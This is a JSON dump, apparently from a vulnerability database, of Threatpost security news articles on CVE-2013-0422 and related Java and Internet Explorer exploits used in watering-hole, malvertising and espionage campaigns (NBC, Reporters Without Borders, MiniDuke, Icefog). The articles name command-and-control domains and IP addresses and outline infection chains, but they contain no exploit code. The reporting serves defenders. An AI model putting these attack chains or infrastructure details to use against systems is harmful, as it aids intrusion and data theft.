Experts say it is sold only in the Russian underground and only to certain customers in order to keep support costs down and reduce the risk of infiltration by law enforcement.\n\nIndependent security consultant Dancho Danchev [tied the NBC attacks to a recent spam campaign targeting Facebook and Verizon](<http://ddanchev.blogspot.com/2013/02/dissecting-nbcs-exploits-and-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+DanchoDanchevOnSecurityAndNewMedia+\\(Dancho+Danchev+-+Mind+Streams+of+Information+Security+Knowledge!\\)>). Danchev said cybercriminals were trying to impersonate Facebook and trick users into thinking their accounts had been shut down. Malicious links used in the spam messages pointed to sites hosting exploits served by the Black Hole Exploit Kit.\n\nDanchev said one of the domains used in the NBC attack matches one used in the Facebook spam campaign, while an email address used to register another domain in the NBC attack matches one similarly used in a campaign against Verizon.\n\n\u201cSomeone\u2019s multitasking,\u201d Danchev said. \u201cThat\u2019s for sure.\u201d\n\nNBC image via [Xurble](<http://www.flickr.com/photos/xurble/>)\u2018s Flickr phtoostream, Creative Commons\n", "modified": "2013-05-08T15:53:59", "published": "2013-02-21T21:07:10", "id": "THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39", "href": "https://threatpost.com/nbc-website-hacked-leading-visitors-citadel-banking-malware-022113/77554/", "type": "threatpost", "title": "NBC Website Hacked, Leading Visitors to Citadel Banking Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:34", "bulletinFamily": "info", "cvelist": ["CVE-2012-0422", "CVE-2013-0422"], "description": "Microsoft can take some solace that it is not alone in sending out security updates that don\u2019t fully address a zero-day vulnerability. 
A researcher at Immunity Inc., put Oracle on a similar hot seat this week when he reported that a recent [out-of-band Java update](<https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/>) repaired only one of two Java flaws being actively exploited.\n\nEsteban Guillardoy said the [Java 1.7 u11 update was incomplete](<http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html>) and cautioned that new exploits could easily pair another zero-day with the remaining unpatched vulnerability and kick off a new spate of attacks.\n\n\u201cAn attacker with enough knowledge of the Java code base and the help of another zero day bug to replace the one fixed can easily continue compromising users,\u201d Guillardoy said.\n\nMeanwhile, IT managers are caught in the middle of a patch management mess. Since the start of the year, not only have a rash of unreported vulnerabilities been exploited in high-profile attacks, but vendor patches or workarounds have fallen short.\n\nMicrosoft\u2019s temporary Fix It for a zero-day in Internet Explorer that was being exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) was quickly [bypassed by researchers at Exodus Intelligence](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). Users of IE 6-8\u2014still the largest install base of the browser\u2014were exposed as early as Dec. 7 when websites serving exploits were first detected; they were publicly reported shortly after Christmas Day. Microsoft made its Fix It available Dec. 29; the bypass was reported Jan. 4 and users remained open to attack until an out-of-band patch was released on Monday.\n\nOracle, meanwhile, won\u2019t have another official Java security update release until Feb. 19. 
Security Explorations of Poland, a research firm known for its work on Java vulnerabilities, said it reported flaws to Oracle in April and September of last year that still have not been patched.\n\nOracle may have another zero day to add to its list for February as well. Security blog [Krebs on Security](<http://krebsonsecurity.com/2013/01/new-java-exploit-fetches-5000-per-buyer/>) reported yesterday another exploit for a different zero day was being sold on a limited basis for $5,000. The blog reported that two versions of the exploit were available\u2014weaponized and source code\u2014and that the sale would be limited to two buyers. A post on the underground forum where this was observed said the new exploit had not been included in any exploit kit, unlike the previous Java zero day which was included in all the major packs including Blackhole, Cool, Nuclear Pack and others. The post has since been removed from the forum, likely indicating the sale is over.\n\nIn the meantime, Oracle has to shore up the Java vulnerability it thought had been patched in 7u11. The Oracle patch was believed to have addressed two vulnerabilities, both covered by [CVE-2013-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>). According to [Oracle\u2019s Java SE documentation](<http://docs.oracle.com/javase/6/docs/technotes/guides/reflection/index.html>), one of the bugs involves reflection, which enables Java to discover information about the constructors and other devices in loaded classes and to operate on underlying counterparts within security restrictions. The API, Oracle said, is the go-between for applications.\n\nThe second vulnerability in question is in the MBeanInstantiator, a flaw that, when used with the reflection API with recursion, bypasses a security check and, with it, the Java sandbox. 
It is the MBeanInstantiator vulnerability that Immunity\u2019s Guillardoy said has not been addressed in the update.\n\n\u201cThe patch (which is Java 7 update 11) doesn\u2019t show any difference at all in the classes inside com.sun.jmx.mbeanserver package,\u201d he wrote. \u201cIt appears then that the MBeanInstantiator.findClass vulnerability is still there in the latest Java update.\u201d\n\nHe said he wrote a simple proof of concept that retrieved restricted Java classes, proving an exploit is still possible.\n\n\u201cSometimes for everyone involved in the offensive world, you need to look at the patch with special detail, because sometimes the vendor stops the worm/0day exploit with a patch, but doesn\u2019t necessary fix all of the associated problems,\u201d Guillardoy wrote. \u201cAnd of course, being only human, sometimes the vendor\u2019s team just plain messes up the patch.\u201d\n\nOracle released Java 1.7u11 on Sunday, four days after exploits were discovered in the wild. The update was not only said to address the vulnerabilities being exploited, but also changed the default Java security level from medium to high. As a result, any unsigned or self-signed Java applications would no longer run by default and would require a user to approve execution of the applet.\n\nSecurity experts said it was a good first step, but an attacker could still use social engineering to trick a user into executing a malicious Java applet. 
Attackers could also steal valid digital certificates and sign malicious applets so that they would run without intervention.\n\nWhile these [Java exploits](<https://www.securelist.com/en/blog/208193822/The_Current_Web_Delivered_Java_0day>) were targeting Windows machines, Java\u2019s ubiquity on all platforms makes it an attractive target for attackers.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere,\u201d said Jaime Blasco, manager of AlienVault Labs. \u201cYou will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n\n_This article was updated on Jan. 17 to clarify that CVE-2013-0422 covers both Java vulnerabilities._\n", "modified": "2013-05-10T14:16:59", "published": "2013-01-17T15:34:07", "id": "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "href": "https://threatpost.com/java-7u11-update-addresses-only-one-two-zero-day-vulnerabilities-011713/77417/", "type": "threatpost", "title": "Java 7u11 Update Addresses Only One of Two Zero-Day Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2012-4681", "CVE-2013-0422"], "description": "A malvertising campaign that\u2019s lasted almost half a year is staying alive thanks to infected web advertisements being circulated by otherwise clean ad networks.\n\nThe campaign, now in its fifth month, relies on the Dynamic Domain Name System (DDNS) to keep it from being caught according to a report from Symantec\u2019s [Security Response blog](<https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/>) that likens its relationship to a \u201cnever-ending story.\u201d\n\nAttackers have been leveraging the ads by inserting their own obfuscated JavaScript into ad network ads. 
The JavaScript helps attackers gauge whether or not victims are running older versions of Internet Explorer and from there, installs tracking cookies and redirects users to a sketchy domain of their choosing.\n\nThe domains change often \u2013 Symantec notes it\u2019s seen the campaign filter users through more than 50 different URLs since its inception in October 2012.\n\nOnce guided to the site, the campaign recognizes the user\u2019s build of Java so multiple JAR files can be dropped onto the system.\n\nThe JAR files target a handful of IE-related Java vulnerabilities ([CVE-2012-4681](<https://threatpost.com/oracle-releases-fix-java-cve-2012-4681-flaw-083012/>) and [CVE-2013-0422](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)) and builds a dynamic-link library (DLL) which then allows attackers to download malware to the machine.\n\nAccording to Cisco\u2019s 2013 Annual Security Report [issued last month](<https://threatpost.com/report-mainstream-websites-host-majority-malware-013113/>), malvertising, the delivery of malware via online ads, \u201cplayed a more significant role in web malware encounters in 2012 than in 2011,\u201d with about 83 percent of malware on the web coming from malicious iframes and scripts last year.\n", "modified": "2013-04-17T16:30:45", "published": "2013-02-11T20:40:31", "id": "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "href": "https://threatpost.com/report-malvertising-campaign-thrives-dynamic-dns-021113/77514/", "type": "threatpost", "title": "Report: Malvertising Campaign Thrives on Dynamic DNS", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:31", "bulletinFamily": "info", "cvelist": ["CVE-2011-3544", "CVE-2012-4792", "CVE-2013-0422"], "description": "[](<https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/>)The [Java 
saga](<https://threatpost.com/its-time-abandon-java-012113/>) continued when unknown, and apparently well concealed goons exploited recent Java and Internet Explorer zero-days to compromise the website of the French-based, free-press advocacy group, Reporters Without Borders. The attack, which attempted to take advantage of the time-gulf that separates Oracle\u2019s patch release from their users\u2019 application of it, is part of a [watering hole campaign](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) also targeting [Tibetan](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>) and Uygur human rights groups as well as Hong Kong and Taiwanese political parties and other non-governmental organizations.\n\n[Writing on the Avast Security blog](<https://blog.avast.com/2013/01/22/reporters-without-borders-website-misused-in-wateringhole-attack/>), Jindrich Kubec claims it is safe to assume that China is behind these attacks. Kubec\u2019s assertion appears to be based, at least in part, on the reality that visitors to the [watering hole](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) sites (and the sites themselves for that matter), are, for lack of a better way to put it, individuals, organizations, and political entities that the People\u2019s Republic publically does not like.\n\nThe watering hole attack is a social engineering technique whereby attackers attempt to compromise websites that are not directly or officially related to their intended targets but which they believe members of an intended target organization are likely to visit.\n\nAccording to the Avast report, the attackers used the recent Internet Explorer and Java vulnerabilities, identified as CVE-2012-4792 and CVE-2013-0422 respectively. 
Microsoft resolved the IE bug with [MS13-008](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>) and Oracle fixed theirs with [Java 7 update 11](<https://threatpost.com/newest-java-7-update-still-exploitable-researcher-says-090412/>).\n\nIn the end, if the exploits succeed they will infect victim machines with either a [remote access trojan](<https://threatpost.com/fakem-rat-mimics-normal-network-traffic-011813/>) that phones home to the Singapore-based \u201cluckmevnc.myvnc.com\u201d (IP address 112.140.186.252) or an injector that flashes a fake error page while downloading a similar remote access tool that communicates with the Hong Kong-based \u201cd.wt.ikwb.com\u201d (58.64.179.139).\n\nAn English version of the Reporters Without Borders site contained a suspicious JavaScript inclusion. That inclusion creates a cookie called \u201csomethingbbbbb\u201d designed to expire after one day. The same cookie was used in similar attacks a few years ago and Kubec believes it could be related to the legitimate m.js cookie, \u201csomethingeeee,\u201d used by a Hong Kong political party.\n\nKubec also determined that an iframe from hxxp://newsite.acmetoy.com/m/d/pdf.html targeted users visiting the site in IE 8. 
There were an additional two iframes, hxxp://newsite.acmetoy.com/m/d/pdf.html and hxxp://newsite.acmetoy.com/m/d/javapdf.html, reserved for those that visited the site on a browser other than IE.\n\nKubec\u2019s analysis of newsite.acmetoy.com found a number of files relating to the IE exploit listed above, including a DOITYOUR obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability as well as DOITYOUR variants of \u201ctoday.swf,\u201d \u201cnews.html,\u201d and \u201crobots.txt.\u201d\n\nThe site also attempted to exploit at least one other Java vulnerability from back in 2011 as well (CVE-2011-3544) and contained the related files, \u201cjavapdf.html,\u201d a javascript file for both vulnerabilities, \u201cAppletHigh.jar,\u201d a CVE-2013-0422 exploit, and \u201cAppletLow.jar,\u201d a CVE-2011-3544 exploit.\n\nIn an analysis of another site (98.129.194.210), Kubec found that it contained the same malicious Java-related content and reasons that it probably serves as a backup to the first in the event of a takedown.\n\nAvast said it notified Reporters Without Borders.\n", "modified": "2013-05-13T18:47:05", "published": "2013-01-23T18:53:02", "id": "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "href": "https://threatpost.com/attackers-exploit-java-compromises-reporters-without-borders-site-012313/77443/", "type": "threatpost", "title": "Attackers Exploit Java, Compromise Reporters Without Borders Site", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:40", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "**Update:** _Aaron Harison, president of the Center for American Freedom, told Threatpost this morning that the issue has been resolved and the site is no longer serving malware. 
_** **\n\nHackers have latched on to the NSA surveillance story\u2014literally.\n\nA news story on the outing of whistleblower Edward Snowden posted to the Washington Free Beacon is serving malware redirecting visitors to a malicious site where more malware awaits. The Free Beacon site remains infected, according to Invincea researchers, who said they have contacted the news organization about the attack. The story is being linked to by the popular Drudge Report and it\u2019s likely to have snared a pretty good number of victims so far.\n\nThe attack on the Free Beacon is similar to a previous [watering hole attack carried out against a number of other Washington, D.C.-based media outlets](<http://threatpost.com/d-c-media-sites-hacked-serving-fake-av/>), including radio station WTOP, Federal News Radio and the site of technology blogger John Dvorak. Invincea researcher Eddie Mitchell wrote on the company\u2019s blog that several other Free Beacon pages are also serving javascript, including the site\u2019s main index page. The javascript drops an iframe that sends traffic offsite to a page hosting the Fiesta Exploit Kit.\n\n\u201cThis exploit appears to be the same as used against other media sites to infect readers of these websites and part of a concerted campaign against media sites to infect their visitors by exploiting vulnerabilities in Java,\u201d Mitchell wrote. \u201c\n\nMitchell cautions that this attack isn\u2019t being detected yet by security companies because signatures associated with the attack are different from previous campaigns.\n\nThe Free Beacon attack is infecting users with the [ZeroAccess rootkit](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/>), as well as scareware. ZeroAccess is a virulent [peer-to-peer botnet](<http://threatpost.com/number-of-peer-to-peer-botnets-grows-5x/>) that has been folded into a number of commercial exploit kits including Blackhole. 
The malware makes an outbound communication requests to a number of command and control servers including e-zeeinternet[.]com, cinnamyn[.]com and twinkcam[.]net, from where the additional malware is loaded onto victim machines.\n\nA little more than a month ago, the campaigns against WTOP and sister station Federal News Radio were discovered. The exploits targeted Java and Adobe plug-ins and were used to spread scareware. Content on both stations is heavily political and the attacks could have been a jumping off point for a larger attack against federal employees who use the site as a resource. Unlike other watering hole attacks that lead to espionage campaigns against activists or political leaders, this one was serving malware usually associated with the cybercrime.\n\nThe Dvorak site was also attacked a month ago and malware was discovered on the site\u2019s [WordPress configuration files](<http://threatpost.com/hackers-using-brute-force-attacks-harvest-wordpress-sites-041513/>). Invincea said at the time that it used Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. The browser was pulling a Java app from the attacker\u2019s site and connecting to one of two Russian domains downloading Amsecure malware, which is part of the Kazy malware family, which is known for ransomware and scareware attacks. Three Java and Reader exploits were discovered on the Dvorak site: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. 
These exploits lead to landing page hosting the Black Hole exploit kit and the Amsecure attacks.\n", "modified": "2013-06-12T16:59:18", "published": "2013-06-10T16:17:14", "id": "THREATPOST:988117842525F1F414002817E6166A11", "href": "https://threatpost.com/nsa-whistleblower-article-redirects-to-malware/100930/", "type": "threatpost", "title": "Free Beacon Article Redirects to ZeroAccess Rootkit, Fake AV", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:09", "bulletinFamily": "info", "cvelist": ["CVE-2012-4792", "CVE-2013-0422", "CVE-2013-0640"], "description": "Researchers at Kaspersky Lab and CrySys Lab have discovered files buried inside a MiniDuke command and control server that indicate the presence of a Web-based facet of the campaign that initially targeted government agencies, primarily in Europe.\n\nUsers are likely lured to the malicious webpages via spear phishing messages containing a link to the attack site. The site, which remains active, is serving exploits for patched vulnerabilities in Java and Internet Explorer, researcher Igor Soumenkov wrote on the [Securelist](<http://www.securelist.com/en/blog/208194159/Miniduke_web_based_infection_vector>) blog today.\n\nSoumenkov said the attack site hosts a pair of frames, one that loads a webpage from a legitimate organization involved in the rebuilding and modernization of Iraq. In addition to the decoy page, a malicious page acts as a \u201cprimitive exploit pack,\u201d Soumenkov said, determining the browser used to visit the attack site and then serves the appropriate exploit. Data collected is also sent to the attacker\u2019s server.[](<https://threatpost.com/new-web-based-miniduke-components-discovered-031113/>)\n\n\u201cThe exploits are located in separate webpages,\u201d Soumenkov wrote. 
\u201cClients using Internet Explorer version 8 are served with about.htm, for other versions of the browser and for any other browser capable of running Java applets, the javascript code loads JavaApplet.html.\u201d\n\nThe Java file loads a Java class file that exploits [CVE-2013-0422](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>), a vulnerability affecting Java 7u10 and older that bypasses the built-in sandbox in Java to allow remote code execution. Soumenkov said the exploit is coded slightly differently than others exploiting this vulnerability, including the Metasploit module, likely to avoid detection by security software. Oracle patched this vulnerability on Jan. 13; the applet was uploaded on Feb. 11, Soumenkov said.\n\nOnce the Java shellcode is executed, it launches an encrypted DLL and writes it to a temporary Java directory with the name ntuser.bin. It then copies the rundll.32.exe system file to the same directory along with another executable that loads the main module of Miniduke.\n\nMiniduke then reaches out to a pre-seeded Twitter post hosting a URL connecting it to the command and control server to download further instructions.\n\nThe IE 8 exploit behaves similarly, but exploits [CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>), which was [patched in December by Microsoft](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>). A Metasploit module was released Dec. 29 and the [Microsoft Security Update MS13-008](<http://technet.microsoft.com/en-us/security/bulletin/ms13-008>) on Jan. 14. Like its Java counterpart, this exploit page was uploaded Feb. 
11.\n\nThe shellcode used in the IE attack downloads a GIF image from the command and control server then decrypts the portable executable file hidden in the image.\n\n\u201cThe PE file also appeared to be a modification of the Miniduke\u2019s main backdoor module that uses the same Twitter URL as the Java payload,\u201d Soumenkov wrote.\n\nMiniDuke surfaced on Feb. 27 and was originally thought to be just a phishing campaign where targets were emailed malicious PDF files pretending to be Ukraine\u2019s foreign policy and NATO membership plans, as well as information for a phony human rights seminar. The PDF attacks targeted CVE-2013-0640, an Adobe Reader vulnerability that had been patched a week earlier. Attackers were able to copy and move files, create new directories, kill processes and install additional malware. MiniDuke was the second successful Reader sandbox bypass.\n\nMiniDuke stood out for researchers for its use of steganography to hide custom backdoor code, as well as using Twitter to reach URLs pointing to command and control servers. Another unique feature of MiniDuke was its use of a small downloader written in an old-school Assembler language used to gather system information unique to the compromised machine.\n\n\u201cThis is a unique and very strange attack. The many different targets hit in separate countries, together with the high profile appearance of the decoy documents and the weird backdoor functionality indicate an unusual threat actor,\u201d said the original Kaspersky and CrySyS report. 
\u201cSome of the elements remind us of both Duqu and Red October, such as the minimalistic approach, hacked servers, encrypted channels but also the typology of the victims.\u201d\n", "modified": "2013-05-08T14:19:31", "published": "2013-03-11T16:29:10", "id": "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "href": "https://threatpost.com/new-web-based-miniduke-components-discovered-031113/77610/", "type": "threatpost", "title": "New Web-Based MiniDuke Components Discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2009-0927", "CVE-2010-0188", "CVE-2013-0422"], "description": "Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.\n\nPopular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.\n\nAs of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. 
But for now, experts are not calling these targeted attacks.\n\n\u201cTypically with \u2018watering hole\u2019 style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim\u2019s network (as we saw with the recent DoL compromise),\u201d said [Invincea](<http://www.invincea.com/2013/05/k-i-a-wtop-com-fednewsradio-and-dvorak-blog-site-serving-malware-media-sites-compromised-to-push-fake-av/>) in a statement provided to Threatpost. \u201cIn the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.\u201d\n\nZscaler, meanwhile, said [the three attacks shared another commonality](<http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html>): the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when the user is detected visiting via Internet Explorer. Zscaler also identified three other media sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.\n\nThe Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. 
An admin for the Dvorak site posted a note that malware had been discovered in the site\u2019s wp-config.php file, which is the main configuration file for the WordPress content management system.\n\n\u201cGiven the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,\u201d Invincea security engineer Eddie Mitchell said.\n\nUpon landing on the Dvorak site, IE pulls a Java application from the attacker\u2019s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.\n\nAmsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.\n\nInvincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. 
These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.\n", "modified": "2013-05-09T20:01:56", "published": "2013-05-07T12:58:12", "id": "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "href": "https://threatpost.com/d-c-media-sites-hacked-serving-fake-av/100268/", "type": "threatpost", "title": "Hacked Media Sites Serving Fake AV Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2012-1723", "CVE-2012-1856", "CVE-2013-0422"], "description": "An espionage campaign featuring precise targeting of victims and malware that allows the attackers one-on-one interaction with compromised systems has been uncovered. Government agencies, manufacturers, high tech companies and media organizations in South Korea and Japan have been the primary targets of the campaign called Icefog, which was reported today by researchers at Kaspersky Lab.\n\nThe China-based campaign is two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.\n\n\n\nHowever, while other APT campaigns maintain a long-term persistence inside infected networks, Icefog seems to do just the opposite. The attackers, Kaspersky researchers said, know what they need from a victim and once they have it, the target is abandoned. They\u2019re also likely a small group of hired guns, akin to mercenaries, used to attack a particular group, steal data, and get out quickly.\n\n\u201cWe\u2019ve entered the era of a growing number of these smaller, agile groups hired on a per-project basis,\u201d said Kaspersky Lab researcher Kurt Baumgartner, speaking today at the Billington Cybersecurity Summit in Washington, D.C. 
\u201cThe operational improvements have arrived and these polished APT groups become much better at flying under the radar.\n\n\u201cFinding a pattern in all the noise is not easy. It\u2019s becoming harder and harder to identify the patterns and connect them with a group,\u201d Baumgartner said.\n\nTo date, Kaspersky Lab\u2019s Global Research and Analysis Team has observed six variants of Icefog and has been able to sinkhole 13 domains used in the attack, capturing snapshots of the malware used and logs detailing victims and interaction with command and control servers.\n\nWindows and Mac OS X versions of Icefog have also been observed, but it appears the OS X backdoor is merely a beta trial of the malware, largely found in online Chinese bulletin boards. Meanwhile, more than 200 unique Windows-based IP addresses have connected to a Kaspersky-controlled sinkhole, a fraction of the total infections researchers said.\n\n\u201cThere\u2019s a team of operators that are being very selective and going after exactly what they need,\u201d said Baumgartner, right. \u201cIt\u2019s classic APT behavior. They likely have previous knowledge of the networks and targets.\u201d\n\nThose targets include defense industry contractors such as Lig Nex1 and Selectron Industrial Company, shipbuilding companies DSME Tech, Hanjin Heavy Industries, telecom operators such as Korea Telecom and media companies such as Fuji TV.\n\nIcefog not only establishes a backdoor connection to the attacker-controlled command infrastructure, but it also drops a number of tools that allow the attackers to steal certain document types and pivot within an infected company looking for more computers to infect and additional resources to steal.\n\nThe campaign also relies on exploits for vulnerabilities that have been patched in Windows or Java to establish a foothold on an endpoint. 
Remote code execution bugs in Windows (CVE-2012-0158 and CVE-2012-1856) spread via malicious Word or Excel files are the most common means of initiating the Icefog attack. The infected attachments promise anything from an illicit image of a woman to a document written in Japanese titled: \u201cLittle enthusiasm for regional sovereignty reform.\u201d Users are also sent links to compromised sites hosting Java exploits (CVE-2013-0422 and CVE-2012-1723).\n\nSeparate spear phishing campaigns were also spotted using HLP files\u2014older versions of Winhelp files\u2014to infect targets. Winhelp was supported natively until Windows Vista was released.\n\n\u201cMost likely, the choice to abuse Winhelp indicates that the attackers have an idea of what version operating systems they are attacking,\u201d the Kaspersky report said.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/22105452/icefog.pdf>)\n\nAnother spear phishing effort used HWP document files to spread Icefog; HWP is a proprietary document format used in South Korea, in particular by the government.\n\nOnce a machine is compromised, the attackers individually analyze system information and files stored on the machine and if it passes muster, the backdoor and lateral movement tools are remotely sent to the machine, including password and hash-dumping tools for saved Internet Explorer and Outlook passwords. A compression program is also sent down to compress stolen data before it\u2019s sent to the command and control server. Beyond credentials, victims are losing Windows address book files (.WAB), as well as HWP, Excel and Word files.\n\nOf the six variants, the oldest in 2011 was used in an attack against Japan\u2019s House of Representatives and House of Councilors. 
Six AOL email addresses were used and commands were also fetched from these accounts.\n\nThe most commonly seen Icefog variant is called Type 1 and it has all the backdoor and lateral movement capabilities described earlier, as well as giving the attackers access to execute SQL commands on SQL Servers found on the network. It\u2019s here where the term Icefog was seen in a string used in the command and control server (the C&C software is named Dagger Three). The command and control script, meanwhile, provides a professional looking interface used to communicate and interact with compromised machines. It uses the native file system to store stolen data and temporary files.\n\n\u201cPerhaps the most interesting part is that the Type 1 C&C panel maintains a full history of the attacker\u2019s interaction with the victims,\u201d the report said. \u201cThis is kept as an encrypted logfile, in the \u2018logs\u2019 directory on the server. In addition to that, the server maintains full interaction logs and command execution results from each victim.\u201d\n\nAnother variant was used to enhance Type 1 infections with additional encryption obfuscating communication with command servers. It was not used against victims and disappeared once a machine was rebooted.\n\nSamples for two other variants have yet to be obtained, but Kaspersky was able to sinkhole three domains used with these attacks. These two variants had only view and update capabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/07040656/ips_icefog.jpg>)\n\nThe most recent version, Icefog-NG, doesn\u2019t communicate with a central command server and instead of using a webserver, its command and control is a Windows desktop application that works as a standalone TCP server listening on port 5600.\n\nKaspersky said it first obtained an Icefog sample in June after an attack on Fuji TV. 
It was able to connect the dots back to the attack on the Japanese parliament two years ago.\n\n\u201cWe predict the number of small, focused APT-for-hire groups to grow, specializing in hit-and-run operations, a kind of \u2018cyber-mercenaries\u2019 of the modern world,\u201d the report said.\n", "modified": "2018-03-22T14:54:55", "published": "2013-09-25T16:30:30", "id": "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "href": "https://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417/", "type": "threatpost", "title": "Icefog Targeted APT Attacks Hit South Korea, Japan", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0422"], "description": "Applet can grant permissions to itself.", "edition": 1, "modified": "2013-01-21T00:00:00", "published": "2013-01-21T00:00:00", "id": "SECURITYVULNS:VULN:12827", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12827", "title": "0-day vulnerability in Oracle Java is used to install malicious software", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2013-0422"], "description": "\r\n\r\nHello All,\r\n\r\nThis post might be interesting for those concerned about the\r\nstate of Oracle's Java SE security.\r\n\r\nWe have successfully confirmed that a complete Java security\r\nsandbox bypass can be still gained under the recent version\r\nof Java 7 Update 11 [1] (JRE version 1.7.0_11-b21).\r\n\r\nMBeanInstantiator bug (or rather a lack of a fix for it [2][3])\r\nturned out to be quite inspirational for us. However, instead\r\nof relying on this particular bug, we have decided to dig our\r\nown issues. 
